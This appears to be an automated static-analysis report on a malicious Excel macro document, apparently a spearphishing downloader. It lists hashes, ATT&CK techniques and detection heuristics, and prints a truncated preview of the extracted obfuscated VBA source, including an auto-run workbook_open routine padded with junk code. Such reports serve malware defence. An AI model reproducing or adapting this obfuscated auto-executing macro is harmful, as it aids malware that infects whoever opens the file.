Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 5955f821356e45f7…

MALICIOUS

Office (OOXML)

Size: 31.4 KB
Created: 2018-10-22 00:01:05 UTC
Authoring application: Microsoft Excel 12.0000
First seen: 2019-01-20
MD5: 252edf8ebdfbd1c992dfd8d570fa176c
SHA-1: d2b98b1fac0d72e146c06b6f22641fc0052aaedc
SHA-256: 5955f821356e45f71788a755902e7ab142c3a6214ec2adc755abbe30f6c44985
Risk score: 202

Malware Insights

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1204.002 Malicious File
  • T1566.001 Spearphishing Attachment

The OOXML file contains a Workbook_Open macro, a common technique for executing malicious VBA code upon opening the document. The macro utilizes CreateObject and Shell() calls, indicating an attempt to download and execute a second-stage payload. The obfuscated nature of the VBA code prevents a more detailed analysis of the payload's specific actions.

Heuristics (6)

  • VBA project inside OOXML (severity: medium; rule: OOXML_VBA; 4 related findings)
    Document contains a VBA project — VBA macros present
  • Shell() call in VBA (severity: critical; rule: OLE_VBA_SHELL)
    Shell() call in VBA
  • Workbook_Open macro (severity: high; rule: OLE_VBA_WBOPEN)
    Workbook_Open macro
  • CreateObject call (severity: high; rule: OLE_VBA_CREATEOBJ)
    CreateObject call
  • VBA p-code auto-exec with execution tokens (severity: high; rule: OLE_VBA_PCODE_AUTOEXEC_EXEC)
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This rule catches p-code-only macro documents, or documents whose source extraction failed, where no visible source is available.
  • Suspicious extracted artifact (severity: info; rule: EXTRACTED_FILE_STATIC_TRIAGE)
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.

Extracted artifacts (2)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source from OOXML)
Size: 17912 bytes
SHA-256: 650809d191393e911a70eecaa8d9054b90e89a4a864f739fc8177279e69aacd3
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 7 long base64-like blob(s).
Script preview (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Private Sub workbook_open()
MwUdGhjV7Hl4.CfWYp5j55jJHPwNGUUSr
While 6 = 719
Dim i3wKUElOGVkb3UtGBjJEaPnvyQr9W64AXJ5Is As Variant
Wend
Dim KCiRSwg8rO4C As Integer
While 24 = 6780
Dim EEuJLOQN_UDVl1JajDqYjWyfjwGcExFBx6PyGzJ As Variant
Wend
Dim m5sz9KoakEVn As Integer
While 17 = 7171
Dim hcarPNiXGxGJMBhpjTRs2vvon9fWFo1_ZbbSchh3Ouvxvgk7m81Pvmu As Variant
Wend
Dim vqvCPqKPb6FsuhN As Integer
While 27 = 7191
Dim LAuXbE_72EWitHwjMwpplpeQKDdR2nwyWWuy As Variant
Wend
Dim dVIous473FaGnT As Integer
While 18 = 4292
Dim leecLXkp_LQgJVV7Ezl_42vgXDlUmfu1tftNSAHuD_ As Variant
Wend
Dim mqnU6_upNCSD7s As Integer

While 28 = 3421
Dim s7_GvOBgaZvnkFmDpz6yND2BGgj7Pqfoi_eU6A9wB_NM As Variant
Wend
Dim hPbmCJUbFFdnDB As Integer
While 25 = 1755
Dim Mo_Os3E_jkPFo1GwHynczD64EUDhaezP As Variant
Wend
Dim AtG6xeTbK2Bu As Integer
While 25 = 5404
Dim Cpj9STyYgHIrJIVxglDt_LnF_zTRSAnK4GCobiG As Variant
Wend
Dim IA1U2iYunHe4 As Integer
While 28 = 9569
Dim hwPuzAc8b_fEfc8xBFqU8d4sH1vfi_oIwEEWl As Variant
Wend
Dim VLm8joIdtxWkk As Integer
While 28 = 7821
Dim rgZH5D3gl8N7XWSUQZWiJn4CVWxsMWBW48UGrmI As Variant
Wend
Dim AdDtMWAKPy As Integer
End Sub


Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Sheet2"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Sheet3"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "MwUdGhjV7Hl4"
Dim AEiYjAE1VSv_DurgYbyzM9xJOAUdwgIDYqZvyVCKMOe5JUW9834cAdBAQXH As String
 Function GaW_AYDlWvgNHRM61BYBKmmOVDE4onUKg4E6mW2gPdT1luUtePf8uNlcw(ziY8uTLJMi9ch3ORN47ixFMvtmleBpip_ByVwj_vzuBEdmXJwPlUDGyrTlMGqpGg9RWfC2em3JsC_GQFNaquDMk6KFBJU2DHldFKN2F5u9a3XvmLTF2O8VbtpZS6zTP)
While 17 = 8749
Dim o_mygS4oK7M1eDOCVttfGnFAPZGUr2XGhAriy8XLMU5SMTi As Variant
Wend
Dim QjVudzjc_2 As Integer
While 12 = 4389
Dim lgEJg6SgERdUoMXTfQurvw5zzuTF4P7gqpKYQAoYkvFB_55GUHRQqQExlOT As Variant
Wend
Dim vjKmyT6m8B8BelT As Integer
While 14 = 6473
Dim F_p3t4yLut8oyXjVvBo2yYGQpHQ6EVFwoVJ_GsdZ6WZ21oFNVnJ9y As Variant
Wend
Dim sep1WKkl3EWmI9a As Integer

 Dim rdIENZmhCOdaTfmZN2NcdbAbOzW1tNywI_6Z4YJIztDFJXMoPFp8EUXNcpzWCvxwZqQOjLfxqDmtW4P1lqimh1qwpp7LivFC6PocF8_Dj1PArm
While 4 = 2990
Dim MdNCgN5a8NZ_AChaJF851cLtf2xCPCNpon_1YGaiwCqk7KiiSnKeKDjt As Variant
Wend
Dim PdenZ2I5_sSV As Integer
While 22 = 1752
Dim BpBCnWGwukvTRNsl1rdkDOj5kvH53vkM1LflkG As Variant
Wend
Dim x5v8oqJUJGfDPNq As Integer
While 11 = 6275
Dim RvEFZ2MK399gc_qF_r1opPP4LZY8wUqS9H4te As Variant
Wend
Dim dp8js38pHqP As Integer


   Dim USTS4Ye_qHJysR4SMnCZ3M6mbTKjeuRz9yjXIFYkvSJpG_9n6DfYkdSFVpziL5h5zTz4
While 22 = 2165
Dim cAeUYhABdK3_aOXgQnhSJ7jeA2_6WRMC As Variant
Wend
Dim sHdvyT4YG2 As Integer
While 8 = 3718
Dim ORjpfTTTpAiV_eY_SfbDmJ8zPQtlq6sHKRqQ4TUtkBkKbUD8Uy_W7CMDTtX As Variant
Wend
Dim MiqmsPZJvxGE As Integer
While 6 = 6155
Dim IqbkivV5MvO25UJH_l6H5FJ3W24AJPIMsALNikdhWc9vau As Variant
Wend
Dim x5OApJJ6CC As Integer
   
While 2 = 5091
Dim fhLp1Ts7lAH4G5hbGWuaGWalD9uHi8Cv7IrAWwpBsBIYk3vSbMBvJk4G As Variant
Wend
Dim Eil1ijVm8U As Integer
While 26 = 8134
Dim Lg_Tprq_LB_IK
... (truncated)
Filename: vbaProject_00.bin
Kind: vba-project
Source: OOXML VBA project: xl/vbaProject.bin
Size: 51200 bytes
SHA-256: 6ad19b581d59deca15ef5dab2c0d6f437a3c4cb08619763ee1cd0b2efa9f57e4
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 7 long base64-like blob(s).